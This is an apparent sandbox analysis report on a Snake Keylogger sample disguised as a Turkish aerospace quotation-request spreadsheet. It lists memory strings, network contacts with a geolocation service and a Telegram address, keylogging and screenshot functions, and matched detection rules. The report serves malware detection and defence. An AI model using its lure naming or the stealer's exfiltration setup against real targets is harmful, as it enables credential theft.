                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
                  Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enx
                  Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000283F000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000286A000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBeq
                  Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/x
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, Form4.csLong String: Length: 169248
                  Source: WheTgQY.exe.0.dr, Form4.csLong String: Length: 169248
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_010CE0440_2_010CE044
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_05BB85880_2_05BB8588
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_05BB00060_2_05BB0006
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_05BB00400_2_05BB0040
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_05BB8AA70_2_05BB8AA7
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_05BBB9020_2_05BBB902
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075651700_2_07565170
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_07560A200_2_07560A20
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075654510_2_07565451
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_0756C4580_2_0756C458
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075654600_2_07565460
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075651600_2_07565160
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075641DF0_2_075641DF
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075641F00_2_075641F0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_075641B90_2_075641B9
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_0756C0200_2_0756C020
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_0756E0D00_2_0756E0D0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_0756DC980_2_0756DC98
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_07562BF80_2_07562BF8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_07560A100_2_07560A10
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_0756D8600_2_0756D860
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_077C4E300_2_077C4E30
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_08F30A800_2_08F30A80
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_08F3F0A90_2_08F3F0A9
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_08F30A700_2_08F30A70
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_0308E0449_2_0308E044
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C185889_2_05C18588
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C100409_2_05C10040
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C100079_2_05C10007
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C1B8F89_2_05C1B8F8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C54609_2_077C5460
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C51709_2_077C5170
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C0A209_2_077C0A20
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077CC4589_2_077CC458
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C54519_2_077C5451
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C51609_2_077C5160
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C41F09_2_077C41F0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C41EF9_2_077C41EF
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C41B99_2_077C41B9
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077CC0209_2_077CC020
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077CE0D09_2_077CE0D0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077CDC989_2_077CDC98
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C2BF89_2_077C2BF8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077C0A109_2_077C0A10
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_077CD8609_2_077CD860
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_09070A809_2_09070A80
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_0907F0A99_2_0907F0A9
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_09070A709_2_09070A70
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C18ADA9_2_05C18ADA
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_05C18AE89_2_05C18AE8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111C14710_2_0111C147
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111536210_2_01115362
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111D27810_2_0111D278
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111C46810_2_0111C468
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111C73810_2_0111C738
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111E98810_2_0111E988
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_011169A010_2_011169A0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111CA0810_2_0111CA08
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01119DE010_2_01119DE0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111CCD810_2_0111CCD8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111CFA910_2_0111CFA9
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01116FC810_2_01116FC8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01113E0910_2_01113E09
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111F63010_2_0111F630
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111E97A10_2_0111E97A
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_011139F010_2_011139F0
